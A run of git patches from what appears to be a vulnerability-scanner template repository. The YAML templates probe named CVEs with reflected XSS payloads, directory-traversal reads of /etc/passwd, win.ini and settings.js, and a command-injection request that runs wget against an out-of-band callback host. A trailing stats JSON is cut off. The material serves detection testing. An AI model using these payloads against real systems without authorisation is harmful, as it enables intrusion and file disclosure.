cve,cve2012,lfi,openemr requests: - method: GET From b2e3670c91d535811f33a9b28a767a9e82e53317 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 31 Jul 2021 08:43:27 +0530 Subject: [PATCH 1318/4083] Update CVE-2014-4536.yaml --- cves/2014/CVE-2014-4536.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml index f095dbf4ae..1d3d5293f3 100644 --- a/cves/2014/CVE-2014-4536.yaml +++ b/cves/2014/CVE-2014-4536.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" matchers-condition: and matchers: - type: word words: - - '">' + - '">' part: body - type: word From 8246b2356c85ba7156c75cb89d12e268b02b8fd6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 31 Jul 2021 08:58:19 +0530 Subject: [PATCH 1319/4083] Update CVE-2019-12276.yaml --- cves/2019/CVE-2019-12276.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2019/CVE-2019-12276.yaml b/cves/2019/CVE-2019-12276.yaml index 151e991888..04aad1e2f5 100644 --- a/cves/2019/CVE-2019-12276.yaml +++ b/cves/2019/CVE-2019-12276.yaml @@ -14,6 +14,8 @@ requests: - method: GET path: - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" + headers: + Connection: close matchers-condition: and matchers: From 077191496a0c191d8afaf9d87ae45f5f67c4e045 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 31 Jul 2021 09:00:47 +0530 Subject: [PATCH 1320/4083] Update CVE-2014-4535.yaml --- cves/2014/CVE-2014-4535.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml index 1d1a8fe91a..78c28ee6cb 100644 --- a/cves/2014/CVE-2014-4535.yaml +++ b/cves/2014/CVE-2014-4535.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E" + - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "'>" + - "'>" part: body - type: word From ae672521d980f4666678566dd06f53d52d388d21 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 31 Jul 2021 16:12:48 +0700 Subject: [PATCH 1321/4083] Update CVE-2021-3223.yaml --- cves/2021/CVE-2021-3223.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 016743b0f8..5088096d4a 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -2,7 +2,7 @@ id: CVE-2021-3223 info: name: Node RED Dashboard - Directory Traversal - author: gy741 + author: gy741,pikpikcu severity: high description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. reference: | @@ -14,8 +14,15 @@ requests: - method: GET path: - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' + - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js' matchers: - type: regex regex: - "root:.*:0:0:" + + - type: word + words: + - "username" + - "password" + - "Node-RED web server is listening" From 620cd107c63747c557e0416ea2523e87d69644b2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 31 Jul 2021 22:55:55 +0530 Subject: [PATCH 1322/4083] Update CVE-2018-10818.yaml --- cves/2018/CVE-2018-10818.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index d4bd7cea24..2562be9725 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -8,7 +8,7 @@ info: reference: | - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - tags: cve,cve2018,lg-nas,rce + tags: cve,cve2018,lg-nas,rce,oob requests: - raw: From aa336ed97937614a4d355031622aae1440b85caa Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 31 Jul 2021 23:08:46 +0530 Subject: [PATCH 1323/4083] matcher update --- .../other/azure-path-traversal.yaml | 23 +++++++++++-------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/vulnerabilities/other/azure-path-traversal.yaml b/vulnerabilities/other/azure-path-traversal.yaml index e8561db2aa..0d1b6786a1 100644 --- a/vulnerabilities/other/azure-path-traversal.yaml +++ b/vulnerabilities/other/azure-path-traversal.yaml @@ -5,24 +5,29 @@ info: author: mesaglio severity: high description: Detect azure directory traversal hosts file. + tags: azure,windows,lfi requests: - method: GET path: - - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/system32/drivers/etc/hosts" - - "{{BaseURL}}/./../../../../../../../../../../windows/system32/drivers/etc/hosts" - - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/system32/drivers/etc/hosts" - - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/system32/drivers/etc/hosts" - - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/system32/drivers/etc/hosts" - - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/system32/drivers/etc/hosts" - - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/system32/drivers/etc/hosts" + - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini" + - "{{BaseURL}}/./../../../../../../../../../../windows/win.ini" + - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini" + - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini" + - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini" + - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini" + - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini" - matchers-condition: or + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "localhost" + - "bit app support" + - "fonts" + - "extensions" + condition: and part: body \ No newline at end of file From 5b3529bad567a45d7b4ed012bc02c365f1e8a611 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 1 Aug 2021 02:39:35 +0900 Subject: [PATCH 1324/4083] Create CVE-2021-21816.yaml An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-21816.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-21816.yaml diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml new file mode 100644 index 0000000000..5d25114756 --- /dev/null +++ b/cves/2021/CVE-2021-21816.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-21816 + +info: + name: D-LINK DIR-3040 - Syslog Information Disclosure + description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. + author: gy741 + severity: medium + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 + tags: cve,cve2021,dlink,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/messages" + + matchers-condition: and + matchers: + - type: word + words: + - "syslog:" + - "admin" + part: body + condition: and + + - type: status + status: + - 200 From 0678e7d2337c10dc9887bb45963160d9fc3dfc56 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 1 Aug 2021 03:10:49 +0900 Subject: [PATCH 1325/4083] Create CVE-2021-36380.yaml The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-36380.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2021/CVE-2021-36380.yaml diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml new file mode 100644 index 0000000000..65d5b49a42 --- /dev/null +++ b/cves/2021/CVE-2021-36380.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-36380 + +info: + name: Sunhillo SureLine - Unauthenticated OS Command Injection + description: The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session. + author: gy741 + severity: critical + reference: | + - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ + tags: cve,cve2021,sureline,rce,oob + +requests: + - raw: + - | + POST /cgi/networkDiag.cgi HTTP/1.1 + Host: {{Hostname}} + + command=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize= + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 5179b5ad7f839d9ff9f615d758b5d11a7a67218f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 31 Jul 2021 18:12:02 +0000 Subject: [PATCH 1326/4083] Auto Generated Templates Stats [Sat Jul 31 18:12:02 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1271 ++++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 663 insertions(+), 630 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 7f012a1194..23d3d7affa 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"ssrf","count":27},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"dlink","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"router","count":8},{"name":"ftp","count":8},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"google","count":6},{"name":"java","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"cve2009","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"login","count":5},{"name":"lucee","count":5},{"name":"solr","count":5},{"name":"ssti","count":5},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"nodejs","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"thinkphp","count":4},{"name":"asp","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"deserialization","count":3},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"fanruan","count":3},{"name":"nacos","count":3},{"name":"windows","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"springcloud","count":3},{"name":"hp","count":3},{"name":"oa","count":3},{"name":"kubernetes","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"slack","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"sonarqube","count":2},{"name":"shellshock","count":2},{"name":"fortios","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"openam","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"cve2008","count":2},{"name":"bitrix","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"spark","count":2},{"name":"nexus","count":2},{"name":"openfire","count":2},{"name":"rockethchat","count":2},{"name":"jboss","count":2},{"name":"sharepoint","count":2},{"name":"kibana","count":2},{"name":"nextjs","count":2},{"name":"vrealize","count":2},{"name":"emerge","count":2},{"name":"leak","count":2},{"name":"cache","count":2},{"name":"yapi","count":2},{"name":"sonicwall","count":2},{"name":"prometheus","count":2},{"name":"paloalto","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"kevinlab","count":2},{"name":"xxljob","count":2},{"name":"intrusive","count":2},{"name":"voipmonitor","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"igs","count":2},{"name":"odoo","count":2},{"name":"chiyu","count":2},{"name":"webcam","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"telerik","count":2},{"name":"zhiyuan","count":2},{"name":"zabbix","count":2},{"name":"flir","count":2},{"name":"service","count":2},{"name":"kentico","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"bigip","count":2},{"name":"pega","count":2},{"name":"wordfence","count":2},{"name":"linkerd","count":2},{"name":"ecology","count":2},{"name":"chamilo","count":2},{"name":"idrac","count":2},{"name":"smtp","count":2},{"name":"natshell","count":2},{"name":"hpe","count":2},{"name":"globalprotect","count":2},{"name":"oauth","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"mida","count":2},{"name":"httpd","count":2},{"name":"jellyfin","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"hashicorp","count":2},{"name":"gitlist","count":1},{"name":"jquery","count":1},{"name":"razor","count":1},{"name":"checkpoint","count":1},{"name":"erp-nc","count":1},{"name":"mongo","count":1},{"name":"idemia","count":1},{"name":"shopware","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"bookstack","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"zend","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"klog","count":1},{"name":"varnish","count":1},{"name":"javamelody","count":1},{"name":"2014","count":1},{"name":"oscommerce","count":1},{"name":"discourse","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"avalanche","count":1},{"name":"eprints","count":1},{"name":"acexy","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"lancom","count":1},{"name":"magicflow","count":1},{"name":"cloudflare","count":1},{"name":"wazuh","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"bruteforce","count":1},{"name":"tenda","count":1},{"name":"backdoor","count":1},{"name":"swagger","count":1},{"name":"wifisky","count":1},{"name":"socomec","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"etouch","count":1},{"name":"proftpd","count":1},{"name":"wavemaker","count":1},{"name":"clave","count":1},{"name":"plugin","count":1},{"name":"fortigates","count":1},{"name":"fortinet","count":1},{"name":"tensorflow","count":1},{"name":"szhe","count":1},{"name":"phpunit","count":1},{"name":"acme","count":1},{"name":"phalcon","count":1},{"name":"dvwa","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"fortiweb","count":1},{"name":"panabit","count":1},{"name":"moin","count":1},{"name":"grav","count":1},{"name":"bitly","count":1},{"name":"manageengine","count":1},{"name":"phpfusion","count":1},{"name":"hiboss","count":1},{"name":"mdb","count":1},{"name":"mirai","count":1},{"name":"netdata","count":1},{"name":"liferay","count":1},{"name":"rfi","count":1},{"name":"monitorix","count":1},{"name":"tongda","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"trilithic","count":1},{"name":"scimono","count":1},{"name":"visualtools","count":1},{"name":"drone","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"skywalking","count":1},{"name":"lanproxy","count":1},{"name":"huijietong","count":1},{"name":"jeewms","count":1},{"name":"rhymix","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"k8","count":1},{"name":"jenkin","count":1},{"name":"opensns","count":1},{"name":"nuxeo","count":1},{"name":"nette","count":1},{"name":"nc2","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"ssltls","count":1},{"name":"redwood","count":1},{"name":"nordex","count":1},{"name":"wso2","count":1},{"name":"goahead","count":1},{"name":"doh","count":1},{"name":"lansweeper","count":1},{"name":"harbor","count":1},{"name":"firebase","count":1},{"name":"redhat","count":1},{"name":"wiki","count":1},{"name":"sceditor","count":1},{"name":"sitecore","count":1},{"name":"vsphere","count":1},{"name":"ec2","count":1},{"name":"plone","count":1},{"name":"primetek","count":1},{"name":"wuzhicms","count":1},{"name":"lotuscms","count":1},{"name":"fedora","count":1},{"name":"itop","count":1},{"name":"monitorr","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"circontrol","count":1},{"name":"lutron","count":1},{"name":"bash","count":1},{"name":"st","count":1},{"name":"alibaba","count":1},{"name":"parentlink","count":1},{"name":"diris","count":1},{"name":"totaljs","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"circontrorl","count":1},{"name":"zte","count":1},{"name":"nuuo","count":1},{"name":"postmessage","count":1},{"name":"setup","count":1},{"name":"mautic","count":1},{"name":"zarafa","count":1},{"name":"zmanda","count":1},{"name":"dotnetnuke","count":1},{"name":"beanshell","count":1},{"name":"upload","count":1},{"name":"blue-ocean","count":1},{"name":"plastic","count":1},{"name":"vscode","count":1},{"name":"ruby","count":1},{"name":"fastapi","count":1},{"name":"ulterius","count":1},{"name":"xunchi","count":1},{"name":"sentry","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"jmx","count":1},{"name":"chinaunicom","count":1},{"name":"darkstat","count":1},{"name":"memcached","count":1},{"name":"stem","count":1},{"name":"grails","count":1},{"name":"kafdrop","count":1},{"name":"enum","count":1},{"name":"zimbra","count":1},{"name":"ilo4","count":1},{"name":"rdp","count":1},{"name":"anchorcms","count":1},{"name":"nedi","count":1},{"name":"mara","count":1},{"name":"mantis","count":1},{"name":"sco","count":1},{"name":"faraday","count":1},{"name":"hasura","count":1},{"name":"kerbynet","count":1},{"name":"servicedesk","count":1},{"name":"opentsdb","count":1},{"name":"salesforce","count":1},{"name":"fastcgi","count":1},{"name":"appweb","count":1},{"name":"openerp","count":1},{"name":"woocomernce","count":1},{"name":"octobercms","count":1},{"name":"linkedin","count":1},{"name":"yachtcontrol","count":1},{"name":"zm","count":1},{"name":"tapestry","count":1},{"name":"vnc","count":1},{"name":"node-red-dashboard","count":1},{"name":"mobileiron","count":1},{"name":"ssl","count":1},{"name":"ecom","count":1},{"name":"empirecms","count":1},{"name":"postgres","count":1},{"name":"svnserve","count":1},{"name":"heroku","count":1},{"name":"moinmoin","count":1},{"name":"centos","count":1},{"name":"jitsi","count":1},{"name":"cacti","count":1},{"name":"cse","count":1},{"name":"cocoon","count":1},{"name":"csrf","count":1},{"name":"timesheet","count":1},{"name":"keenetic","count":1},{"name":"xff","count":1},{"name":"flash","count":1},{"name":"gogs","count":1},{"name":"majordomo2","count":1},{"name":"opensmtpd","count":1},{"name":"exchange","count":1},{"name":"opm","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"pgadmin","count":1},{"name":"webui","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"mpsec","count":1},{"name":"exacqvision","count":1},{"name":"sprintful","count":1},{"name":"bullwark","count":1},{"name":"netrc","count":1},{"name":"openrestry","count":1},{"name":"smartsense","count":1},{"name":"flink","count":1},{"name":"metinfo","count":1},{"name":"robomongo","count":1},{"name":"emc","count":1},{"name":"fortigate","count":1},{"name":"cve2005","count":1},{"name":"gridx","count":1},{"name":"synnefo","count":1},{"name":"calendarix","count":1},{"name":"eyou","count":1},{"name":"xdcms","count":1},{"name":"subrion","count":1},{"name":"servicenow","count":1},{"name":"rmi","count":1},{"name":"db","count":1},{"name":"enumeration","count":1},{"name":"powercreator","count":1},{"name":"jenzabar","count":1},{"name":"zzzcms","count":1},{"name":"openstack","count":1},{"name":"ems","count":1},{"name":"wmt","count":1},{"name":"chevereto","count":1},{"name":"74cms","count":1},{"name":"mailchimp","count":1},{"name":"webadmin","count":1},{"name":"glances","count":1},{"name":"cgi","count":1},{"name":"episerver","count":1},{"name":"dompdf","count":1},{"name":"rsyncd","count":1},{"name":"shopxo","count":1},{"name":"aspnuke","count":1},{"name":"viewpoint","count":1},{"name":"mariadb","count":1},{"name":"wavlink","count":1},{"name":"javafaces","count":1},{"name":"webmodule-ee","count":1},{"name":"hortonworks","count":1},{"name":"kubeflow","count":1},{"name":"sqlite","count":1},{"name":"cors","count":1},{"name":"geutebruck","count":1},{"name":"labtech","count":1},{"name":"apiman","count":1},{"name":"nps","count":1},{"name":"jnoj","count":1},{"name":"azure","count":1},{"name":"fortilogger","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"seacms","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"finereport","count":1},{"name":"viewlinc","count":1},{"name":"haproxy","count":1},{"name":"spring","count":1},{"name":"npm","count":1},{"name":"xml","count":1},{"name":"wamp","count":1},{"name":"spectracom","count":1},{"name":"ricoh","count":1},{"name":"pacsone","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"concrete","count":1},{"name":"landray","count":1},{"name":"accela","count":1},{"name":"mediumish","count":1},{"name":"alerta","count":1},{"name":"k8s","count":1},{"name":"avtech","count":1},{"name":"akamai","count":1},{"name":"weiphp","count":1},{"name":"ntopng","count":1},{"name":"wp-theme","count":1},{"name":"turbocrm","count":1},{"name":"netis","count":1},{"name":"expressjs","count":1},{"name":"kyan","count":1},{"name":" default-login","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"dlogin","count":1},{"name":"ns","count":1},{"name":"esmtp","count":1},{"name":"tika","count":1},{"name":"uwsgi","count":1},{"name":"sarg","count":1},{"name":"glpi","count":1},{"name":"rmc","count":1},{"name":"kong","count":1},{"name":"favicon","count":1},{"name":"fiori","count":1},{"name":"cloudinary","count":1},{"name":"blackboard","count":1},{"name":"symfony","count":1},{"name":"panos","count":1},{"name":"landrayoa","count":1},{"name":"druid","count":1},{"name":"gateone","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"floc","count":1},{"name":"feifeicms","count":1},{"name":"arl","count":1},{"name":"lighttpd","count":1},{"name":"portainer","count":1},{"name":"hadoop","count":1},{"name":"maccmsv10","count":1},{"name":"wooyun","count":1},{"name":"solman","count":1},{"name":"horde","count":1},{"name":"sidekiq","count":1},{"name":"krweb","count":1},{"name":"htmli","count":1},{"name":"myucms","count":1},{"name":"h3c-imc","count":1},{"name":"tileserver","count":1},{"name":"email","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"ueditor","count":1},{"name":"bedita","count":1},{"name":"traefik","count":1},{"name":"mcafee","count":1},{"name":"commscope","count":1},{"name":"geddy","count":1},{"name":"realteo","count":1},{"name":"addpac","count":1},{"name":"jfrog","count":1},{"name":"node","count":1},{"name":"biometrics","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"emby","count":1},{"name":"ioncube","count":1},{"name":"axis","count":1},{"name":"visionhub","count":1},{"name":"saltapi","count":1},{"name":"rabbitmq","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"yii","count":1},{"name":"clusterengine","count":1},{"name":"status","count":1},{"name":"spf","count":1},{"name":"zcms","count":1},{"name":"jsf","count":1},{"name":"opencast","count":1},{"name":"zookeeper","count":1},{"name":"dom","count":1},{"name":"discord","count":1},{"name":"codemeter","count":1},{"name":"embedthis","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"phpinfo","count":1},{"name":"rujjie","count":1},{"name":"apos","count":1},{"name":"dvr","count":1},{"name":"xiuno","count":1},{"name":"nomad","count":1},{"name":"springframework","count":1},{"name":"ambari","count":1},{"name":"pyramid","count":1},{"name":"zeroshell","count":1},{"name":"clockwatch","count":1},{"name":"scs","count":1},{"name":"b2evolution","count":1},{"name":"netsweeper","count":1},{"name":"webmin","count":1},{"name":"cobub","count":1},{"name":"adminer","count":1},{"name":"jsp","count":1},{"name":"upnp","count":1},{"name":"tamronos","count":1},{"name":"javascript","count":1},{"name":"mantisbt","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdah